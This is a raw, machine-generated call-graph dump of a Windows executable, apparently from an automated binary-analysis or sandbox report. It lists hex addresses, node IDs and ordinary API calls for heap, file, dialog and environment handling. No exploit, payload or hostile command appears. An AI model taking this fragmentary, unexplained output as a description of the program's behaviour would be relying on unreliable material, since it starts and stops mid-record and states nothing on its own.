TerminateProcess 23933->23949 23935 fffcea 23935->23924 23936->23918 23937->23928 23939 1004653 23938->23939 23945 10040ef 23938->23945 23939->23945 23950 10097e5 GetLastError 23939->23950 23941 1004674 23970 100993a 38 API calls __fassign 23941->23970 23943 100468d 23971 1009967 38 API calls __fassign 23943->23971 23946 1004601 20 API calls 2 library calls 23945->23946 23946->23923 23947->23926 23948->23928 23949->23935 23951 1009801 23950->23951 23952 10097fb 23950->23952 23956 1009850 SetLastError 23951->23956 23973 100b136 23951->23973 23972 100ae5b 11 API calls 2 library calls 23952->23972 23956->23941 23957 100981b 23980 1008dcc 23957->23980 23959 1009830 23959->23957 23962 1009837 23959->23962 23961 1009821 23963 100985c SetLastError 23961->23963 23987 1009649 20 API calls __dosmaperr 23962->23987 23988 1008d24 38 API calls _abort 23963->23988 23965 1009842 23967 1008dcc _free 20 API calls 23965->23967 23969 1009849 23967->23969 23969->23956 23969->23963 23970->23943 23971->23945 23972->23951 23978 100b143 __dosmaperr 23973->23978 23974 100b183 23990 10091a8 20 API calls __dosmaperr 23974->23990 23975 100b16e RtlAllocateHeap 23976 1009813 23975->23976 23975->23978 23976->23957 23986 100aeb1 11 API calls 2 library calls 23976->23986 23978->23974 23978->23975 23989 1007a5e 7 API calls 2 library calls 23978->23989 23981 1008e00 __dosmaperr 23980->23981 23982 1008dd7 RtlFreeHeap 23980->23982 23981->23961 23982->23981 23983 1008dec 23982->23983 23991 10091a8 20 API calls __dosmaperr 23983->23991 23985 1008df2 GetLastError 23985->23981 23986->23959 23987->23965 23989->23978 23990->23976 23991->23985 23993 fe9781 23992->23993 23994 fe9757 23992->23994 23993->23755 23994->23993 24003 fea1e0 23994->24003 23998 fe964a 23997->23998 23999 fe962c 23997->23999 24000 fe9669 23998->24000 24011 fe6bd5 76 API calls 23998->24011 23999->23998 24001 fe9638 CloseHandle 23999->24001 24000->23755 24001->23998 24004 ffec50 24003->24004 24005 fea1ed DeleteFileW 24004->24005 24006 fe977f 24005->24006 24007 fea200 24005->24007 24006->23755 24008 febb03 GetCurrentDirectoryW 24007->24008 24009 fea214 24008->24009 24009->24006 24010 fea218 DeleteFileW 24009->24010 24010->24006 24011->24000 24018 fed9b0 24012->24018 24015 fee66b LoadStringW 24016 fee645 SetDlgItemTextW 24015->24016 24017 fee682 LoadStringW 24015->24017 24016->23766 24017->24016 24023 fed8ec 24018->24023 24020 fed9cd 24021 fed9e2 24020->24021 24031 fed9f0 26 API calls 24020->24031 24021->24015 24021->24016 24024 fed904 24023->24024 24030 fed984 _strncpy 24023->24030 24026 fed928 24024->24026 24032 ff1da7 WideCharToMultiByte 24024->24032 24027 fed959 24026->24027 24033 fee5b1 50 API calls __vsnprintf 24026->24033 24034 1006159 26 API calls 3 library calls 24027->24034 24030->24020 24031->24021 24032->24026 24033->24027 24034->24030 24036 ffb31e 24035->24036 24037 ffb40d 24036->24037 24038 ffb3f0 ExpandEnvironmentStringsW 24036->24038 24037->23778 24038->24037 24039->23778 24040->23778 24041->23791 24042->23778 24043->23778 24044->23778 24046 1008e54 24045->24046 24047 1008e61 24046->24047 24048 1008e6c 24046->24048 24058 1008e06 24047->24058 24049 1008e74 24048->24049 24057 1008e7d __dosmaperr 24048->24057 24051 1008dcc _free 20 API calls 24049->24051 24054 1008e69 24051->24054 24052 1008e82 24065 10091a8 20 API calls __dosmaperr 24052->24065 24053 1008ea7 HeapReAlloc 24053->24054 24053->24057 24054->23778 24057->24052 24057->24053 24066 1007a5e 7 API calls 2 library calls 24057->24066 24059 1008e44 24058->24059 24063 1008e14 __dosmaperr 24058->24063 24068 10091a8 20 API calls __dosmaperr 24059->24068 24061 1008e2f RtlAllocateHeap 24062 1008e42 24061->24062 24061->24063 24062->24054 24063->24059 24063->24061 24067 1007a5e 7 API calls 2 library calls 24063->24067 24065->24054 24066->24057 24067->24063 24068->24062 24070 ff0666 _wcslen 24069->24070 24097 fe17e9 24070->24097 24072 ff067e 24072->23795 24074 ff0659 _wcslen 24073->24074 24075 fe17e9 78 API calls 24074->24075 24076 ff067e 24075->24076 24076->23797 24078 fe7b17 __EH_prolog 24077->24078 24114 fece40 24078->24114 24080 fe7b32 24120 ffeb38 24080->24120 24082 fe7b5c 24129 ff4a76 24082->24129 24085 fe7c7d 24086 fe7c87 24085->24086 24088 fe7cf1 24086->24088 24161 fea56d 24086->24161 24090 fe7d50 24088->24090 24139 fe8284 24088->24139 24089 fe7d92 24089->23801 24090->24089 24167 fe138b 74 API calls 24090->24167 24094 fe7bac 24093->24094 24096 fe7bb3 24093->24096 24095 ff2297 86 API calls 24094->24095 24095->24096 24098 fe17ff 24097->24098 24109 fe185a __InternalCxxFrameHandler 24097->24109 24099 fe1828 24098->24099 24110 fe6c36 76 API calls __vswprintf_c_l 24098->24110 24100 fe1887 24099->24100 24101 fe1847 ___std_exception_copy 24099->24101 24104 1003e3e 22 API calls 24100->24104 24101->24109 24112 fe6ca7 75 API calls 24101->24112 24103 fe181e 24111 fe6ca7 75 API calls 24103->24111 24106 fe188e 24104->24106 24106->24109 24113 fe6ca7 75 API calls 24106->24113 24109->24072 24110->24103 24111->24099 24112->24109 24113->24109 24115 fece4a __EH_prolog 24114->24115 24116 ffeb38 8 API calls 24115->24116 24117 fece8d 24116->24117 24118 ffeb38 8 API calls 24117->24118 24119 feceb1 24118->24119 24119->24080 24121 ffeb3d ___std_exception_copy 24120->24121 24122 ffeb57 24121->24122 24125 ffeb59 24121->24125 24135 1007a5e 7 API calls 2 library calls 24121->24135 24122->24082 24124 fff5c9 24137 100238d RaiseException 24124->24137 24125->24124 24136 100238d RaiseException 24125->24136 24128 fff5e6 24130 ff4a80 __EH_prolog 24129->24130 24131 ffeb38 8 API calls 24130->24131 24132 ff4a9c 24131->24132 24133 fe7b8b 24132->24133 24138 ff0e46 80 API calls 24132->24138 24133->24085 24135->24121 24136->24124 24137->24128 24138->24133 24140 fe828e __EH_prolog 24139->24140 24168 fe13dc 24140->24168 24142 fe82aa 24143 fe82bb 24142->24143 24311 fe9f42 24142->24311 24146 fe82f2 24143->24146 24176 fe1a04 24143->24176 24307 fe1692 24146->24307 24152 fe83e8 24203 fe1f6d 24152->24203 24155 fe83f3 24155->24146 24207 fe3b2d 24155->24207 24219 fe848e 24155->24219 24157 fea56d 7 API calls 24158 fe82ee 24157->24158 24158->24146 24158->24157 24159 fe8389 24158->24159 24315 fec0c5 CompareStringW _wcslen 24158->24315 24195 fe8430 24159->24195 24162 fea582 24161->24162 24163 fea5b0 24162->24163 24571 fea69b 24162->24571 24163->24086 24165 fea592 24165->24163 24166 fea597 FindClose 24165->24166 24166->24163 24167->24089 24169 fe13e1 __EH_prolog 24168->24169 24170 fece40 8 API calls 24169->24170 24171 fe1419 24170->24171 24172 ffeb38 8 API calls 24171->24172 24175 fe1474 _abort 24171->24175 24173 fe1461 24172->24173 24173->24175 24316 feb505 24173->24316 24175->24142 24177 fe1a0e __EH_prolog 24176->24177 24189 fe1a61 24177->24189 24192 fe1b9b 24177->24192 24332 fe13ba 24177->24332 24179 fe1bc7 24335 fe138b 74 API calls 24179->24335 24182 fe3b2d 101 API calls 24186 fe1c12 24182->24186 24183 fe1bd4 24183->24182 24183->24192 24184 fe1c5a 24188 fe1c8d 24184->24188 24184->24192 24336 fe138b 74 API calls 24184->24336 24186->24184 24187 fe3b2d 101 API calls 24186->24187 24187->24186 24188->24192 24193 fe9e80 79 API calls 24188->24193 24189->24179 24189->24183 24189->24192 24190 fe3b2d 101 API calls 24191 fe1cde 24190->24191 24191->24190 24191->24192 24192->24158 24193->24191 24194 fe9e80 79 API calls 24194->24189 24354 fecf3d 24195->24354 24197 fe8440 24358 ff13d2 GetSystemTime SystemTimeToFileTime 24197->24358 24199 fe83a3 24199->24152 24200 ff1b66 24199->24200 24359 ffde6b 24200->24359 24204 fe1f72 __EH_prolog 24203->24204 24206 fe1fa6 24204->24206 24367 fe19af 24204->24367 24206->24155 24208 fe3b3d 24207->24208 24209 fe3b39 24207->24209 24218 fe9e80 79 API calls 24208->24218 24209->24155 24210 fe3b4f 24211 fe3b6a 24210->24211 24212 fe3b78 24210->24212 24214 fe3baa 24211->24214 24497 fe32f7 89 API calls 2 library calls 24211->24497 24498 fe286b 101 API calls 3 library calls 24212->24498 24214->24155 24216 fe3b76 24216->24214 24499 fe20d7 74 API calls 24216->24499 24218->24210 24220 fe8498 __EH_prolog 24219->24220 24225 fe84d5 24220->24225 24234 fe8513 24220->24234 24524 ff8c8d 103 API calls 24220->24524 24222 fe84f5 24223 fe851c 24222->24223 24224 fe84fa 24222->24224 24223->24234 24526 ff8c8d 103 API calls 24223->24526 24224->24234 24525 fe7a0d 152 API calls 24224->24525 24225->24222 24229 fe857a 24225->24229 24225->24234 24229->24234 24500 fe5d1a 24229->24500 24230 fe8605 24230->24234 24506 fe8167 24230->24506 24233 fe8797 24235 fea56d 7 API calls 24233->24235 24236 fe8802 24233->24236 24234->24155 24235->24236 24512 fe7c0d 24236->24512 24238 fed051 82 API calls 24239 fe885d 24238->24239 24239->24234 24239->24238 24240 fe898b 24239->24240 24242 fe8992 24239->24242 24527 fe8117 84 API calls 24239->24527 24528 fe2021 74 API calls 24239->24528 24529 fe2021 74 API calls 24240->24529 24241 fe8a5f 24246 fe8ab6 24241->24246 24254 fe8a6a 24241->24254 24242->24241 24247 fe89e1 24242->24247 24245 fe8a4c 24248 fe8b14 24245->24248 24253 fe8ab4 24245->24253 24246->24245 24532 fe7fc0 97 API calls 24246->24532 24247->24245 24247->24248 24252 fea231 3 API calls 24247->24252 24255 fe8b82 24248->24255 24296 fe9105 24248->24296 24533 fe98bc 24248->24533 24250 fe959a 80 API calls 24250->24234 24251 fe959a 80 API calls 24251->24234 24256 fe8a19 24252->24256 24253->24251 24254->24253 24531 fe7db2 101 API calls 24254->24531 24258 feab1a 8 API calls 24255->24258 24256->24245 24530 fe92a3 97 API calls 24256->24530 24260 fe8bd1 24258->24260 24261 feab1a 8 API calls 24260->24261 24277 fe8be7 24261->24277 24265 fe8b70 24537 fe6e98 77 API calls 24265->24537 24267 fe8cbc 24268 fe8d18 24267->24268 24269 fe8e40 24267->24269 24270 fe8d8a 24268->24270 24271 fe8d28 24268->24271 24272 fe8e66 24269->24272 24273 fe8e52 24269->24273 24292 fe8d49 24269->24292 24278 fe8167 19 API calls 24270->24278 24274 fe8d6e 24271->24274 24282 fe8d37 24271->24282 24276 ff3377 75 API calls 24272->24276 24275 fe9215 123 API calls 24273->24275 24274->24292 24540 fe77b8 111 API calls 24274->24540 24275->24292 24279 fe8e7f 24276->24279 24277->24267 24280 fe8c93 24277->24280 24286 fe981a 79 API calls 24277->24286 24281 fe8dbd 24278->24281 24543 ff3020 123 API calls 24279->24543 24280->24267 24538 fe9a3c 82 API calls 24280->24538 24288 fe8de6 24281->24288 24289 fe8df5 24281->24289 24281->24292 24539 fe2021 74 API calls 24282->24539 24286->24280 24541 fe7542 85 API calls 24288->24541 24542 fe9155 93 API calls __EH_prolog 24289->24542 24295 fe8f85 24292->24295 24544 fe2021 74 API calls 24292->24544 24294 fe9090 24294->24296 24298 fea4ed 3 API calls 24294->24298 24295->24294 24295->24296 24297 fe903e 24295->24297 24518 fe9f09 SetEndOfFile 24295->24518 24296->24250 24519 fe9da2 24297->24519 24301 fe90eb 24298->24301 24301->24296 24545 fe2021 74 API calls 24301->24545 24302 fe9085 24304 fe9620 77 API calls 24302->24304 24304->24294 24305 fe90fb 24546 fe6dcb 76 API calls 24305->24546 24308 fe16a4 24307->24308 24562 fecee1 24308->24562 24312 fe9f59 24311->24312 24313 fe9f63 24312->24313 24570 fe6d0c 78 API calls 24312->24570 24313->24143 24315->24158 24317 feb50f __EH_prolog 24316->24317 24322 fef1d0 82 API calls 24317->24322 24319 feb521 24323 feb61e 24319->24323 24322->24319 24324 feb630 _abort 24323->24324 24327 ff10dc 24324->24327 24330 ff109e GetCurrentProcess GetProcessAffinityMask 24327->24330 24331 feb597 24330->24331 24331->24175 24337 fe1732 24332->24337 24334 fe13d6 24334->24194 24335->24192 24336->24188 24338 fe1748 24337->24338 24349 fe17a0 __InternalCxxFrameHandler 24337->24349 24339 fe1771 24338->24339 24350 fe6c36 76 API calls __vswprintf_c_l 24338->24350 24340 fe17c7 24339->24340 24345 fe178d ___std_exception_copy 24339->24345 24342 1003e3e 22 API calls 24340->24342 24344 fe17ce 24342->24344 24343 fe1767 24351 fe6ca7 75 API calls 24343->24351 24344->24349 24353 fe6ca7 75 API calls 24344->24353 24345->24349 24352 fe6ca7 75 API calls 24345->24352 24349->24334 24350->24343 24351->24339 24352->24349 24353->24349 24355 fecf4d 24354->24355 24357 fecf54 24354->24357 24356 fe981a 79 API calls 24355->24356 24356->24357 24357->24197 24358->24199 24360 ffde78 24359->24360 24361 fee617 53 API calls 24360->24361 24362 ffde9b 24361->24362 24363 fe4092 _swprintf 51 API calls 24362->24363 24364 ffdead 24363->24364 24365 ffd4d4 16 API calls 24364->24365 24366 ff1b7c 24365->24366 24366->24152 24368 fe19bf 24367->24368 24369 fe19bb 24367->24369 24371 fe18f6 24368->24371 24369->24206 24372 fe1908 24371->24372 24373 fe1945 24371->24373 24374 fe3b2d 101 API calls 24372->24374 24379 fe3fa3 24373->24379 24377 fe1928 24374->24377 24377->24369 24383 fe3fac 24379->24383 24380 fe3b2d 101 API calls 24380->24383 24381 fe1966 24381->24377 24384 fe1e50 24381->24384 24383->24380 24383->24381 24396 ff0e08 24383->24396 24385 fe1e5a __EH_prolog 24384->24385 24404 fe3bba 24385->24404 24387 fe1e84 24388 fe1732 78 API calls 24387->24388 24390 fe1f0b 24387->24390 24389 fe1e9b 24388->24389 24432 fe18a9 78 API calls 24389->24432 24390->24377 24392 fe1eb3 24394 fe1ebf _wcslen 24392->24394 24433 ff1b84 MultiByteToWideChar 24392->24433 24434 fe18a9 78 API calls 24394->24434 24397 ff0e0f 24396->24397 24398 ff0e2a 24397->24398 24402 fe6c31 RaiseException _com_raise_error 24397->24402 24399 ff0e3b SetThreadExecutionState 24398->24399 24403 fe6c31 RaiseException _com_raise_error 24398->24403 24399->24383 24402->24398 24403->24399 24405 fe3bc4 __EH_prolog 24404->24405 24406 fe3bda 24405->24406 24407 fe3bf6 24405->24407 24460 fe138b 74 API calls 24406->24460 24409 fe3e51 24407->24409 24412 fe3c22 24407->24412 24477 fe138b 74 API calls 24409->24477 24411 fe3be5 24411->24387 24412->24411 24435 ff3377 24412->24435 24414 fe3d2e 24445 feab1a 24414->24445 24415 fe3ca3 24415->24414 24431 fe3c9a 24415->24431 24463 fed051 24415->24463 24416 fe3c9f 24416->24415 24462 fe20bd 78 API calls 24416->24462 24418 fe3c8f 24461 fe138b 74 API calls 24418->24461 24419 fe3c71 24419->24415 24419->24416 24419->24418 24422 fe3d41 24425 fe3dd7 24422->24425 24426 fe3dc7 24422->24426 24469 ff3020 123 API calls 24425->24469 24449 fe9215 24426->24449 24429 fe3dd5 24429->24431 24470 fe2021 74 API calls 24429->24470 24471 ff2297 24431->24471 24432->24392 24433->24394 24434->24390 24436 ff338c 24435->24436 24437 ff3396 ___std_exception_copy 24435->24437 24478 fe6ca7 75 API calls 24436->24478 24439 ff341c 24437->24439 24440 ff34c6 24437->24440 24444 ff3440 _abort 24437->24444 24479 ff32aa 75 API calls 3 library calls 24439->24479 24480 100238d RaiseException 24440->24480 24443 ff34f2 24444->24419 24446 feab28 24445->24446 24448 feab32 24445->24448 24447 ffeb38 8 API calls 24446->24447 24447->24448 24448->24422 24450 fe921f __EH_prolog 24449->24450 24481 fe7c64 24450->24481 24453 fe13ba 78 API calls 24454 fe9231 24453->24454 24484 fed114 24454->24484 24456 fe928a 24456->24429 24458 fed114 118 API calls 24459 fe9243 24458->24459 24459->24456 24459->24458 24493 fed300 97 API calls __InternalCxxFrameHandler 24459->24493 24460->24411 24461->24431 24462->24415 24464 fed084 24463->24464 24465 fed072 24463->24465 24495 fe603a 82 API calls 24464->24495 24494 fe603a 82 API calls 24465->24494 24468 fed07c 24468->24414 24469->24429 24470->24431 24472 ff22a1 24471->24472 24473 ff22ba 24472->24473 24476 ff22ce 24472->24476 24496 ff0eed 86 API calls 24473->24496 24475 ff22c1 24475->24476 24477->24411 24478->24437 24479->24444 24480->24443 24482 feb146 GetVersionExW 24481->24482 24483 fe7c69 24482->24483 24483->24453 24490 fed12a __InternalCxxFrameHandler 24484->24490 24485 fed29a 24486 fed0cb 6 API calls 24485->24486 24488 fed2ce 24485->24488 24486->24488 24487 ff0e08 SetThreadExecutionState RaiseException 24491 fed291 24487->24491 24488->24487 24489 ff8c8d 103 API calls 24489->24490 24490->24485 24490->24489 24490->24491 24492 feac05 91 API calls 24490->24492 24491->24459 24492->24490 24493->24459 24494->24468 24495->24468 24496->24475 24497->24216 24498->24216 24499->24214 24501 fe5d2a 24500->24501 24547 fe5c4b 24501->24547 24504 fe5d5d 24505 fe5d95 24504->24505 24552 feb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24504->24552 24505->24230 24507 fe8186 24506->24507 24508 fe8232 24507->24508 24559 febe5e 19 API calls __InternalCxxFrameHandler 24507->24559 24558 ff1fac CharUpperW 24508->24558 24511 fe823b 24511->24233 24513 fe7c22 24512->24513 24514 fe7c5a 24513->24514 24560 fe6e7a 74 API calls 24513->24560 24514->24239 24516 fe7c52 24561 fe138b 74 API calls 24516->24561 24518->24297 24520 fe9db3 24519->24520 24523 fe9dc2 24519->24523 24521 fe9db9 FlushFileBuffers 24520->24521 24520->24523 24521->24523 24522 fe9e3f SetFileTime 24522->24302 24523->24522 24524->24225 24525->24234 24526->24234 24527->24239 24528->24239 24529->24242 24530->24245 24531->24253 24532->24245 24534 fe98c5 GetFileType 24533->24534 24535 fe8b5a 24533->24535 24534->24535 24535->24255 24536 fe2021 74 API calls 24535->24536 24536->24265 24537->24255 24538->24267 24539->24292 24540->24292 24541->24292 24542->24292 24543->24292 24544->24295 24545->24305 24546->24296 24553 fe5b48 24547->24553 24549 fe5c6c 24549->24504 24551 fe5b48 2 API calls 24551->24549 24552->24504 24554 fe5b52 24553->24554 24556 fe5c3a 24554->24556 24557 feb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24554->24557 24556->24549 24556->24551 24557->24554 24558->24511 24559->24508 24560->24516 24561->24514 24564 fecef2 24562->24564 24568 fea99e 86 API calls 24564->24568 24565 fecf24 24569 fea99e 86 API calls 24565->24569 24567 fecf2f 24568->24565 24569->24567 24570->24313 24572 fea6a8 24571->24572 24573 fea727 FindNextFileW 24572->24573 24574 fea6c1 FindFirstFileW 24572->24574 24576 fea732 GetLastError 24573->24576 24581 fea709 24573->24581 24575 fea6d0 24574->24575 24574->24581 24577 febb03 GetCurrentDirectoryW 24575->24577 24576->24581 24578 fea6e0 24577->24578 24579 fea6fe GetLastError 24578->24579 24580 fea6e4 FindFirstFileW 24578->24580 24579->24581 24580->24579 24580->24581 24581->24165 24591 ffa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24582->24591 24584 ffa5cd 24585 ffa5d9 24584->24585 24592 ffa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24584->24592 24585->23808 24585->23809 24587->23810 24588->23818 24589->23818 24590->23821 24591->24584 24592->24585 24593->23829 24595 fe9f42 78 API calls 24594->24595 24596 fe1fe8 24595->24596 24597 fe2005 24596->24597 24598 fe1a04 101 API calls 24596->24598 24597->23837 24597->23838 24599 fe1ff5 24598->24599 24599->24597 24601 fe138b 74 API calls 24599->24601 24601->24597 24603 ffb5bc GetDlgItem 24602->24603 24604 ffb583 GetMessageW 24602->24604 24603->23848 24603->23849 24605 ffb599 IsDialogMessageW 24604->24605 24606 ffb5a8 TranslateMessage DispatchMessageW 24604->24606 24605->24603 24605->24606 24606->24603 24607 fe13e1 84 API calls 2 library calls 25403 ff94e0 GetClientRect 25404 fff2e0 46 API calls __RTC_Initialize 25456 ff21e0 26 API calls std::bad_exception::bad_exception 25458 100f421 21 API calls __vswprintf_c_l 24671 ffe2d7 24672 ffe1db 24671->24672 24673 ffe85d ___delayLoadHelper2@8 14 API calls 24672->24673 24673->24672 24675 fe10d5 24680 fe5abd 24675->24680 24681 fe5ac7 __EH_prolog 24680->24681 24682 feb505 84 API calls 24681->24682 24683 fe5ad3 24682->24683 24687 fe5cac GetCurrentProcess GetProcessAffinityMask 24683->24687 25406 fff4d3 20 API calls 24688 ffe1d1 14 API calls ___delayLoadHelper2@8 24690 100bb30 24691 100bb39 24690->24691 24692 100bb42 24690->24692 24694 100ba27 24691->24694 24695 10097e5 _abort 38 API calls 24694->24695 24696 100ba34 24695->24696 24714 100bb4e 24696->24714 24698 100ba3c 24723 100b7bb 24698->24723 24701 100ba53 24701->24692 24702 1008e06 __vswprintf_c_l 21 API calls 24703 100ba64 24702->24703 24713 100ba96 24703->24713 24730 100bbf0 24703->24730 24706 1008dcc _free 20 API calls 24706->24701 24707 100ba91 24740 10091a8 20 API calls __dosmaperr 24707->24740 24708 100baae 24710 100bada 24708->24710 24711 1008dcc _free 20 API calls 24708->24711 24710->24713 24741 100b691 26 API calls 24710->24741 24711->24710 24713->24706 24715 100bb5a __FrameHandler3::FrameUnwindToState 24714->24715 24716 10097e5 _abort 38 API calls 24715->24716 24718 100bb64 24716->24718 24721 100bbe8 _abort 24718->24721 24722 1008dcc _free 20 API calls 24718->24722 24742 1008d24 38 API calls _abort 24718->24742 24743 100ac31 EnterCriticalSection 24718->24743 24744 100bbdf LeaveCriticalSection _abort 24718->24744 24721->24698 24722->24718 24724 1004636 __fassign 38 API calls 24723->24724 24725 100b7cd 24724->24725 24726 100b7dc GetOEMCP 24725->24726 24727 100b7ee 24725->24727 24729 100b805 24726->24729 24728 100b7f3 GetACP 24727->24728 24727->24729 24728->24729 24729->24701 24729->24702 24731 100b7bb 40 API calls 24730->24731 24732 100bc0f 24731->24732 24735 100bc60 IsValidCodePage 24732->24735 24737 100bc16 24732->24737 24739 100bc85 _abort 24732->24739 24733 fffbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24734 100ba89 24733->24734 24734->24707 24734->24708 24736 100bc72 GetCPInfo 24735->24736 24735->24737 24736->24737 24736->24739 24737->24733 24745 100b893 GetCPInfo 24739->24745 24740->24713 24741->24713 24743->24718 24744->24718 24751 100b8cd 24745->24751 24754 100b977 24745->24754 24747 fffbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24750 100ba23 24747->24750 24750->24737 24755 100c988 24751->24755 24753 100ab78 __vswprintf_c_l 43 API calls 24753->24754 24754->24747 24756 1004636 __fassign 38 API calls 24755->24756 24757 100c9a8 MultiByteToWideChar 24756->24757 24759 100c9e6 24757->24759 24760 100ca7e 24757->24760 24762 1008e06 __vswprintf_c_l 21 API calls 24759->24762 24765 100ca07 _abort __vsnwprintf_l 24759->24765 24761 fffbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24760->24761 24763 100b92e 24761->24763 24762->24765 24769 100ab78 24763->24769 24764 100ca78 24774 100abc3 20 API calls _free 24764->24774 24765->24764 24767 100ca4c MultiByteToWideChar 24765->24767 24767->24764 24768 100ca68 GetStringTypeW 24767->24768 24768->24764 24770 1004636 __fassign 38 API calls 24769->24770 24771 100ab8b 24770->24771 24775 100a95b 24771->24775 24774->24760 24776 100a976 __vswprintf_c_l 24775->24776 24777 100a99c MultiByteToWideChar 24776->24777 24778 100ab50 24777->24778 24779 100a9c6 24777->24779 24780 fffbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24778->24780 24782 1008e06 __vswprintf_c_l 21 API calls 24779->24782 24785 100a9e7 __vsnwprintf_l 24779->24785 24781 100ab63 24780->24781 24781->24753 24782->24785 24783 100aa30 MultiByteToWideChar 24784 100aa9c 24783->24784 24786 100aa49 24783->24786 24811 100abc3 20 API calls _free 24784->24811 24785->24783 24785->24784 24802 100af6c 24786->24802 24790 100aa73 24790->24784 24793 100af6c __vswprintf_c_l 11 API calls 24790->24793 24791 100aaab 24794 1008e06 __vswprintf_c_l 21 API calls 24791->24794 24797 100aacc __vsnwprintf_l 24791->24797 24792 100ab41 24810 100abc3 20 API calls _free 24792->24810 24793->24784 24794->24797 24795 100af6c __vswprintf_c_l 11 API calls 24798 100ab20 24795->24798 24797->24792 24797->24795 24798->24792 24799 100ab2f WideCharToMultiByte 24798->24799 24799->24792 24800 100ab6f 24799->24800 24812 100abc3 20 API calls _free 24800->24812 24813 100ac98 24802->24813 24806 100afdc LCMapStringW 24807 100af9c 24806->24807 24808 fffbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24807->24808 24809 100aa60 24808->24809 24809->24784 24809->24790 24809->24791 24810->24784 24811->24778 24812->24784 24814 100acc8 24813->24814 24817 100acc4 24813->24817 24814->24807 24820 100aff4 10 API calls 3 library calls 24814->24820 24815 100ace8 24815->24814 24818 100acf4 GetProcAddress 24815->24818 24817->24814 24817->24815 24821 100ad34 24817->24821 24819 100ad04 __dosmaperr 24818->24819 24819->24814 24820->24806 24822 100ad55 LoadLibraryExW 24821->24822 24826 100ad4a 24821->24826 24823 100ad72 GetLastError 24822->24823 24824 100ad8a 24822->24824 24823->24824 24827 100ad7d LoadLibraryExW 24823->24827 24825 100ada1 FreeLibrary 24824->24825 24824->24826 24825->24826 24826->24817 24827->24824 25459 100c030 GetProcessHeap 25409 ff62ca 123 API calls __InternalCxxFrameHandler 24836 ffdec2 24837 ffdecf 24836->24837 24838 fee617 53 API calls 24837->24838 24839 ffdedc 24838->24839 24840 fe4092 _swprintf 51 API calls 24839->24840 24841 ffdef1 SetDlgItemTextW 24840->24841 24842 ffb568 5 API calls 24841->24842 24843 ffdf0e 24842->24843 25461 ffb5c0 100 API calls 25462 ff77c0 118 API calls 25463 ffffc0 RaiseException _com_raise_error _com_error::_com_error 25464 1003a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25410 1011f40 CloseHandle 25465 ff1bbd GetCPInfo IsDBCSLeadByte 24851 fff3b2 24852 fff3be __FrameHandler3::FrameUnwindToState 24851->24852 24883 ffeed7 24852->24883 24854 fff3c5 24855 fff518 24854->24855 24858 fff3ef 24854->24858 24956 fff838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24855->24956 24857 fff51f 24949 1007f58 24857->24949 24867 fff42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24858->24867 24894 1008aed 24858->24894 24865 fff40e 24873 fff48f 24867->24873 24952 1007af4 38 API calls 2 library calls 24867->24952 24869 fff495 24903 1008a3e 51 API calls 24869->24903 24872 fff49d 24904 ffdf1e 24872->24904 24902 fff953 GetStartupInfoW _abort 24873->24902 24877 fff4b1 24877->24857 24878 fff4b5 24877->24878 24879 fff4be 24878->24879 24954 1007efb 28 API calls _abort 24878->24954 24955 fff048 12 API calls ___scrt_uninitialize_crt 24879->24955 24882 fff4c6 24882->24865 24884 ffeee0 24883->24884 24958 fff654 IsProcessorFeaturePresent 24884->24958 24886 ffeeec 24959 1002a5e 24886->24959 24888 ffeef1 24893 ffeef5 24888->24893 24967 1008977 24888->24967 24891 ffef0c 24891->24854 24893->24854 24895 1008b04 24894->24895 24896 fffbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24895->24896 24897 fff408 24896->24897 24897->24865 24898 1008a91 24897->24898 24899 1008ac0 24898->24899 24900 fffbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24899->24900 24901 1008ae9 24900->24901 24901->24867 24902->24869 24903->24872 25067 ff0863 24904->25067 24908 ffdf3d 25116 ffac16 24908->25116 24910 ffdf46 _abort 24911 ffdf59 GetCommandLineW 24910->24911 24912 ffdf68 24911->24912 24913 ffdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24911->24913 25120 ffc5c4 24912->25120 24914 fe4092 _swprintf 51 API calls 24913->24914 24916 ffe04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24914->24916 25131 ffb6dd LoadBitmapW 24916->25131 24919 ffdf76 OpenFileMappingW 24922 ffdf8f MapViewOfFile 24919->24922 24923 ffdfd6 CloseHandle 24919->24923 24920 ffdfe0 25125 ffdbde 24920->25125 24926 ffdfcd UnmapViewOfFile 24922->24926 24927 ffdfa0 __InternalCxxFrameHandler 24922->24927 24923->24913 24926->24923 24931 ffdbde 2 API calls 24927->24931 24933 ffdfbc 24931->24933 24932 ff90b7 8 API calls 24934 ffe0aa DialogBoxParamW 24932->24934 24933->24926 24935 ffe0e4 24934->24935 24936 ffe0fd 24935->24936 24937 ffe0f6 Sleep 24935->24937 24939 ffe10b 24936->24939 25161 ffae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 24936->25161 24937->24936 24940 ffe12a DeleteObject 24939->24940 24941 ffe13f DeleteObject 24940->24941 24942 ffe146 24940->24942 24941->24942 24943 ffe189 24942->24943 24944 ffe177 24942->24944 25158 ffac7c 24943->25158 25162 ffdc3b 6 API calls 24944->25162 24946 ffe17d CloseHandle 24946->24943 24948 ffe1c3 24953 fff993 GetModuleHandleW 24948->24953 25294 1007cd5 24949->25294 24952->24873 24953->24877 24954->24879 24955->24882 24956->24857 24958->24886 24971 1003b07 24959->24971 24962 1002a67 24962->24888 24964 1002a6f 24965 1002a7a 24964->24965 24985 1003b43 DeleteCriticalSection 24964->24985 24965->24888 25014 100c05a 24967->25014 24970 1002a7d 7 API calls 2 library calls 24970->24893 24972 1003b10 24971->24972 24974 1003b39 24972->24974 24975 1002a63 24972->24975 24986 1003d46 